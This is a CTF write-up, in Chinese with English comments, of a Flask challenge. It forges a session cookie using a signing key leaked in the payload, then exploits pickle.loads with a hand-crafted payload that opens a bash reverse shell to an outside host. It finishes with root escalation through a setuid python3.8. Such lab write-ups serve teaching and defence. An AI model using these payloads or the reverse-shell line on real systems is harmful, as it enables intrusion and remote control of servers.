0x1

题目提示有 www.zip，下载后得到里面的 app.py

from flask import Flask, session
from secret import secret

@app.route('/verification')
def verification():
    """Return ``secret`` only when the session's ``Attribute`` dict names admin.

    The session is a client-held, signed cookie, so this check is exactly as
    strong as the signing key: whoever holds that key can mint an
    ``Attribute`` of their choosing. NOTE(review): the accompanying writeup
    shows the key was carried inside the session payload itself, which is
    what made forgery possible here.

    Returns:
        ``'Hacker!!!'`` when the session cannot be read or ``Attribute`` is
        not a dict, a "stranger" message when ``name`` is not ``admin``,
        ``secret`` when ``admin == 1``, and a refusal otherwise.
    """
    try:
        claims = session.get('Attribute')
    except Exception:
        # Any failure to read the session is treated as tampering.
        return 'Hacker!!!'
    if not isinstance(claims, dict):
        return 'Hacker!!!'
    if claims.get('name') != 'admin':
        return "You are a perfect stranger to me"
    # A boolean True also compares equal to 1 here.
    if claims.get('admin') == 1:
        return secret
    return "Don't play tricks on me"

if __name__ == '__main__':
    # Flask's built-in server, reachable on every interface, port 80.
    app.run(host='0.0.0.0', port=80)

明显应该是 Flask session 伪造，具体可以参考 https://antel0p3.github.io/2023/08/19/LitCTF2023-flagclick-wp/

# Session value taken from the cookie; decoding needs no key, since Flask
# sessions are signed but not encrypted.
$ python3 flask_session_cookie_manager.py decode -c "eyJBdHRyaWJ1dGUiOnsiYWRtaW4iOjAsIm5hbWUiOiJHV0hUIiwic2VjcmV0X2tleSI6IkdXSFRuNGhlaWp0RVRUIn19.ZPM8vQ.BukMzKlq_IzarfBPlj81mXkRZQc"
# {"Attribute":{"admin":0,"name":"GWHT","secret_key":"GWHTn4heijtETT"}}

# Root cause: the signing key (secret_key) is stored inside the session
# payload itself, so the cookie can be re-signed with a changed Attribute.
# The fix is to keep the key out of any client-visible data.
$ python3 flask_session_cookie_manager.py encode -s "GWHTn4heijtETT" -t '{"Attribute":{"admin":1,"name":"admin","secret_key":"GWHTn4heijtETT"}}'
# eyJBdHRyaWJ1dGUiOnsiYWRtaW4iOjEsIm5hbWUiOiJhZG1pbiIsInNlY3JldF9rZXkiOiJHV0hUbjRoZWlqdEVUVCJ9fQ.ZPM9Yw.CSad0BXG0k7E6ds_Om4lYMcXIto

更改 cookie 后再次访问 /verification 可以看到

Hello admin, welcome to /ppppppppppick1e

0x2

访问 /ppppppppppick1e 只看到 Hello, admin，其他什么都没有

查看响应头发现有 Hint: Source in /src0de

0x3

访问 /src0de 得到

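@app.route('/src0de')
def src0de():
    """Serve this module's own source from the ``/src0de`` route onward.

    Returns the text of ``__file__`` starting at the literal
    ``@app.route('/src0de')`` marker; everything above that marker is not
    returned.

    Raises:
        ValueError: if the marker is not present in the file.
    """
    # The context manager closes the handle even if read() raises.
    with open(__file__, 'r') as src_file:
        source = src_file.read()
    marker = "@app.route('/src0de')"
    # Source disclosure is deliberate for this challenge; a real service
    # should not expose an endpoint like this at all.
    return source[source.index(marker):]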


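@app.route('/ppppppppppick1e')
def ppppppppppick1e():
    """Greet ``admin`` and, if a ``pick1e`` cookie is present, unpickle it.

    With no cookie the greeting response (carrying a ``hint`` header) is
    returned. Otherwise the cookie is base64-decoded, passed to ``check``
    (defined elsewhere in this file) and, if accepted, handed to
    ``pickle.loads``; the unpickled value is discarded.

    Returns:
        The greeting response when no cookie is sent, ``"Go for it!!!"`` or
        ``"No Way!!!"`` depending on ``check``, or a generic error string
        when decoding or unpickling raises.
    """
    username = "admin"
    try:
        rsp = make_response("Hello, %s " % username)
        rsp.headers['hint'] = "Source in /src0de"
        encoded = request.cookies.get('pick1e')
        if encoded is None:
            return rsp
        raw = base64.b64decode(encoded)
        if not check(raw):
            return "No Way!!!"
        # SECURITY: pickle.loads on client-supplied bytes runs whatever
        # callables the opcode stream names, so no pre-check of the bytes
        # (whatever check() does) can make it safe. This is the
        # deserialization flaw the challenge is built around; a real
        # service would use a data-only format such as JSON here.
        pickle.loads(raw)
        return "Go for it!!!"
    except Exception:
        # Log server-side only; echoing str(e) to the client reveals
        # internal details.
        app.logger.exception("pick1e handling failed")
        return "Internal error"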


class GWHT:
    """Empty class with no attributes or behaviour of its own."""

    def __init__(self):
        """Build an instance; nothing is initialised."""
if __name__ == '__main__':
    # Flask's built-in server, reachable on every interface, port 80.
    app.run(host='0.0.0.0', port=80)

明显第 21 行的 pickle.loads 存在 pickle 反序列化漏洞

import pickle
import pickletools
import base64

# Proof-of-concept for the pickle.loads call above: a hand-written opcode
# stream that, when unpickled, calls os.system with a shell command. This is
# why client-controlled bytes must never reach pickle.loads; the mitigation is
# a data-only format such as JSON.
# NOTE(review): as printed, the remark after the S'...' line sits inside the
# b''' literal, so this snippet does not parse as-is.
poc = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1"' # 这里需要一个自己的vps公网ip
o.'''

# Disassemble the opcode stream for inspection, then print it raw and in
# base64 form.
pickletools.dis(poc)
print(poc)
print(base64.b64encode(poc))
# KGNvcwpzeXN0ZW0KUydiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzQ3LjEwOS4zNi4yNi84ODg4IDA+JjEiJwpvLg==

具体参考

https://zhuanlan.zhihu.com/p/361349643 https://zhuanlan.zhihu.com/p/89132768

用cookie editor 加上 pick1e=KGNvcw...后刷新可以得到反弹shell

0x4

发现根目录下有 flag，但需要 root 权限才能读取，于是开始提权

# Enumerate setuid-root binaries. All entries but the last are stock setuid
# utilities; a setuid-root interpreter (/usr/bin/python3.8) lets any local
# user run code as root, which is the misconfiguration the escalation relies
# on. Hardening: remove the setuid bit from the interpreter (chmod u-s).
$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/python3.8

可以看到 python3.8 带有 setuid 位（属主为 root）

# Works only because /usr/bin/python3.8 carries the setuid bit (see the find
# output above); with that bit removed the spawned shell runs as the
# unprivileged user.
$ python3.8 -c 'import os; os.execl("/bin/sh", "sh", "-p")'	# no prompt is shown afterwards; just type commands
$ cat /flag